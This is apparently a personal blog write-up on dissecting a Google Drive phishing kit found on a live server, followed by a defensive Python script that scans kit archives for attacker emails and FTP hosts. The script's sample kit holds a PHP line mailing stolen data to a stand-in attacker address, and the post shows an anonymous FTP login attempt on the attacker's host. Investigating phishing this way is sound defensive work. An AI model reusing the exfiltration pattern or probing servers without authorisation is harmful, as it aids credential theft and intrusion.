Recently friends of mine were victims of a phishing attack which had begun to spread to their clients via a compromised email account. Panic had sunk in and an email went out:
As they explained the situation, I quickly found out that no one was looking into it, so I offered a hand. The phishing email was forwarded; it didn’t contain much, just a simple “call to action” to entice the user to open the attached PDF:
As I double clicked the PDF to take a look, I made a quick prayer to the dark gods of old that this attack was targeted (it was a slow news week). Sadly it wasn’t anything interesting:
Like any good little phishing victim I clicked the link which took me here (The site was still up as of the 2nd of August 2017). There were no surprises to be had, it was a simple Google Drive phishing landing page *sigh*:
At this point I made the reasonable assumption that the scammer was lazy and counting on easy targets. Usually this meant that they didn’t bother to clean up their phishing kit post-deployment. Sure enough, two levels up sat a Gdrivee.zip file:
Yeah I clicked EVERYTHING.
Usually phishing kits contain the email address of the attacker so I downloaded and unpacked:
index.php, there it was:
Oh email@example.com you silly spammer. They don’t do much online either, the one web search result led me here:
Right... back to the phishing kit autopsy, I ran tree on the extracted directory:
As you can see, I didn’t find much else with the exception of one thing, a Dreamweaver Sync XML file:
Neat, an FTP server. Sadly, that was where the road ended for me:
    $ ftp ftp.webuyanyclub.com
    Connected to ftp.webuyanyclub.com.
    220 FTP server ready
    Name (ftp.webuyanyclub.com): anonymous
    331 Password required for anonymous
    Password:
    530 Login failed. Please verify the username and password supplied, and that FTP has been unlocked. Check your control panel or contact support for more information.
    Login failed.
Oh well, maybe next time I’ll get my much coveted targeted attack to investigate.
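
The two checks from the autopsy above, as an added example (not code from the original post): it reads a kit archive in memory, collects email addresses from script files, and pulls the server attribute out of Dreamweaver sync files. The _notes/dwsync.xml name and layout are assumed from Dreamweaver's usual output, and the sample kit, its paths and its addresses are constructed.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
SCRIPT_EXT = (".php", ".js", ".html", ".htm")
MAX_MEMBER = 5_000_000  # skip oversized members (cheap zip-bomb guard)


def triage_kit(zip_bytes):
    """Return ({email: files}, {server: files}) without unpacking to disk."""
    emails, servers = {}, {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as kit:
        for info in kit.infolist():
            if info.is_dir() or info.file_size > MAX_MEMBER:
                continue
            data = kit.read(info)
            lower = info.filename.lower()
            if lower.endswith(SCRIPT_EXT):
                text = data.decode("utf-8", errors="replace")
                for addr in EMAIL_RE.findall(text):
                    emails.setdefault(addr.lower(), set()).add(info.filename)
            elif lower.endswith("dwsync.xml"):
                # Kit content is untrusted: refuse DTDs/entities before parsing.
                if b"<!DOCTYPE" in data or b"<!ENTITY" in data:
                    continue
                try:
                    root = ET.fromstring(data)
                except ET.ParseError:
                    continue
                for node in root.iter("file"):
                    server = node.get("server")
                    if server:
                        servers.setdefault(server, set()).add(node.get("name", "?"))
    return emails, servers


def build_sample_kit():
    """Constructed sample archive; every path and value here is made up."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("kit/index.php",
                   '<?php $to = "drop@attacker.example"; mail($to, "log", $msg); ?>')
        z.writestr("kit/_notes/dwsync.xml",
                   '<?xml version="1.0" encoding="utf-8" ?><dwsync><file name="index.php" '
                   'server="ftp.host.example/public_html/" local="1" remote="1" /></dwsync>')
    return buf.getvalue()


if __name__ == "__main__":
    print(triage_kit(build_sample_kit()))
```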